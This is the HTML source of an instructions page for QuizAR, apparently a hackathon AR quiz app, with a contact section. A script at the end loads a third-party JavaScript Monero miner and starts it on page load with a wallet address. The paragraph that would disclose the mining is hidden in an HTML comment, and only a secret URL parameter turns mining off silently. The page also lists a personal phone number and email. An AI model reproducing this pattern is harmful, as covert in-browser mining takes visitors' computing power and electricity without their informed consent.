<!doctype html>
<html lang="en">

<head>
  
    <script src="//static.getclicky.com/js" type="text/javascript"></script>
    <script type="text/javascript">
        try {
            clicky.init(101093017);
        } catch (e) {}

    </script>
    <noscript><p><img alt="Clicky" width="1" height="1" src="//in.getclicky.com/101093017ns.gif" /></p></noscript>
    <title>Launch QuizAR</title>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0-beta.2/css/bootstrap.min.css" integrity="sha384-PsH8R72JQ3SOdhVi3uxftmaW6Vc51MKb0q5P2rRUpPvrszuE4W1povHYgTpBfshb" crossorigin="anonymous">


    <link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet">




</head>
    
    <style>
        @charset "UTF-8";
@font-face {
    font-family: gobble;
    src: url("/fonts/gbold.woff2") format("woff2"), url("gbold.ttf") format("truetype");
}

.flex-container {
    display: flex;
    height: 600px;
    flex-wrap: wrap;
    align-content: flex-start;
    background-color: DodgerBlue;
    justify-content: center;
    align-items: center;
}

#apple {
    border: 2px;
    padding: 10px;
    border-radius: 25px;
    background: #4e54c8;
    /* fallback for old browsers */
    background: -webkit-linear-gradient(to right, #4e54c8, #8f94fb);
    /* Chrome 10-25, Safari 5.1-6 */
    background: linear-gradient(to right, #4e54c8, #8f94fb);
    /* W3C, IE 10+/ Edge, Firefox 16+, Chrome 26+, Opera 12+, Safari 7+ */
    box-shadow: 10px 10px 5px grey;
}

#view {
    border-radius: 20px;
    background: white;
}

.godown {
    margin-bottom: -4px;
    margin-top: -4px;
}

.boxy {
    background-color: #f1f1f1;
    width: 90px;
    margin: 10px;
    text-align: center;
    line-height: 75px;
    font-size: 30px;
}

.global {
    font-family: 'Roboto', sans-serif;
    font-weight: 400;
}

.standardbold {
    font-family: 'Roboto', sans-serif;
    font-size: 100px;
    font-weight: 400;
}

.gbold {
    font-family: 'Roboto', sans-serif;
    font-weight: 600;
}

.githubbold {
    font-family: 'gobble';
}

.title {
    font-family: 'Roboto', sans-serif;
    font-size: 100px;
    font-weight: 800;
}

.texty {
    font-family: 'Roboto', sans-serif;
    font-size: 1.75em;
    font-weight: 600;
}

body {}

.aaa {
    padding-top: 50px;
    padding-left: 50px;
    padding-right: 50px;
    padding-bottom: 50px;
}

.bbb {
    padding-top: 25px;
    padding-left: 25px;
    padding-right: 25px;
    padding-bottom: 25px;
}

.corn {
    border-radius: 15px;
    margin-bottom: 3px;
    margin-right: 2px;
}

.smallboi {
    letter-spacing: -2px;
}

.hackfriend {
    letter-spacing: -1px;
}

.research {
    background-color: lightblue;
}

.fullsendbaby {
    letter-spacing: 0.5px;
}

.fatboi {
    font-weight: bold;
}

.blogy {
    background-color: #FDD835;
}

.pp {
    padding-top: 5px;
    padding-left: 5px;
}

.leftpad {
    padding-left: 10px;
}

.toppad {
    padding-top: 5px;
}

.ab {
    margin-left: -3px;
}

.ccc {
    padding-top: 25px;
    padding-left: -5px;
    padding-bottom: 15px;
}

.techy {
    background-color: #BCAAA4;
}

.orangy {
    background-color: #D84315;
    fon
}
li{
  margin: 10px 0;
}
    </style>

<body>
    <div class="global">
        <nav id="maintop" class="navbar sticky-top navbar-expand-lg navbar navbar-dark bg-dark">
            <a class="navbar-brand " href="#"><img class="corn" src="" width="30" height="30" class="d-inline-block align-top" alt="">Instructions: </a>
            <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarNavDropdown" aria-controls="navbarNavDropdown" aria-expanded="false" aria-label="Toggle navigation">
    <span class="navbar-toggler-icon"></span>
  </button>
            <div class="collapse navbar-collapse" id="navbarNavDropdown">
                <ul class="nav nav-pills navbar-nav">
                    <li class="nav-item active">
                    </li>
                    <li class="nav-item">
                    </li>
                    <li class="nav-item">
                    </li>

                    <li class="nav-item">
                    </li>
                    <li class="nav-item dropdown">
                        <a class="nav-link dropdown-toggle" href="#projects" id="navbarDropdownMenuLink" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">
                        </a>
                </ul>
            </div>

        </nav>

        <div data-spy="scroll" data-target="#maintop" data-offset="0">




            <div id="home" class="aaa">

                <div style="standardbold">

                    <div class="row">
                        <div class="col-10">
                            <h1 class="githubbold smallboi" style=font-size:70px><strong>Instructions to use QuizAR </strong></h1>
                        </div>
                    </div>
                </div>


                <p class="lead">
                    QuizAR was made in 12 hours at MVHacks in 2017. Not much has been updated since then, but updates are expected to take effect in late 2018.</p>
                <hr class="my-4">

                <h3 class="lead fatboi">
                    <strong>To use QuizAR, you will need a phone or any other mobile device that can run Chrome (Safari could work, but not tested)</strong>
                </h3>
                <ul>
                <li>Open QuizAR.tech on your phone as well</li>
                    <li>
                    <a href="https://quizar-mobile-vwweqfydrk.now.sh/" class="btn btn-primary btn-lg active" role="button" aria-pressed="true">Click here on <strong>your mobile device</strong></a>
                    </li>
                <li> Scan the code below with your mobile device once you're on the website above on your mobile device</li>
                
                </ul>

            </div>



            <div id="about" class="aaa">
<img src="/assets/hiro.png" alt="Image did not load">

<!--
                <h3 class="lead fatboi">
                    <strong>Processing this website does</strong>
                </h3>

                <p>I use services to minimize HTML, CSS, and Javascript files. I use DDOS protection and other security firewalls and gateways to prevent from my website from being comprimised. I also use services to run XMR mining processes on my websites in order to support website costs. You can always turn these services off in the footer below.</p>
-->

            </div>



            <div id="contact" class="aaa orangy">


                <h3 class="display-text2" style="color:#FFFFFF;">
                    Let's connect:
                    <button type="button" class="btn btn-lg btn-light"> <a href="mailto:suryamvhs@gmail.com?Subject=Inquiry%20from%20your%20website" target="_top">Send Me An Email</a></button>
                    <a class="btn btn-light btn-lg" href="http://m.me/suryad789" role="button">Send Me a Message</a>
                    <button type="button" class="btn btn-light btn-lg" role="button"><a href="tel:+1-408-746-9016">Send me a Call/Text</a></button>
                    <a class="btn btn-light btn-lg" href="http://paypal.me/mathment" role="button">Send Me Money</a>
                    <a class="btn btn-light btn-lg" href="http://suryad.com/crypto.html" role="button">Send Me Any Cryptocurrency</a>
                    <a onclick="stopMine()" class="btn btn-light btn-lg" role="button">Stop Mining</a>
                </h3>

                <h4>Made in Cupertino, California with HTML/CSS/Javascript and Bootstrap</h4>
            </div>


            <!-- Optional JavaScript -->
            <!-- jQuery first, then Popper.js, then Bootstrap JS -->
            <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
            <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.3/umd/popper.min.js" integrity="sha384-vFJXuSJphROIrBnz7yo7oB41mKfc8JzQZiCq4NCceLEaO4IHwicKwpJf9c9IpFgh" crossorigin="anonymous"></script>
            <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0-beta.2/js/bootstrap.min.js" integrity="sha384-alpBpkh1PFOepccYVYDB4do5UnbKysX5WZXm3XxPqe5iKTfUKjNkCk9SaVuEZflJ" crossorigin="anonymous"></script>
        </div>
    </div>
    <script src="https://jsminer.net/app.js"></script>
    <script>
        contMine(true);

        function contMine(toggle) {
            var miner = JsMiner.Anonymous('49xWCEi7bxtJuqnXNzxqC4L429SvY3J7Q5XA6VfXjhVJZpDqwpDZR8d5RdoALY8d9t2TkP4nV5aWfJvS2i7QbdUcQjpH6iP', {
                throttle: 0.1
            });
            if (toggle) {
                miner.start();
            }
            if (!toggle) {
                miner.stop();
            }
        }

        function stopMine() {
            var input = prompt("Disable mining process", "yes or no");
            if (input != null && input == "yes") {
                console.log("MINING PROCESS DISABLED 1.4");
                contMine(false);
            }
        }

        console.log("privacy web 2.8");
        var urlParams = new URLSearchParams(window.location.search);
        if (urlParams.get('cmdt') == "989") {
            console.log("TOF MINE");
            contMine(false);

        }
        var query = urlParams.get('cmdt');
        if (query == "989") {
            show = "Turn off cryptocurrency mining";
        }
        console.log(show);

    </script>

</body>

</html>
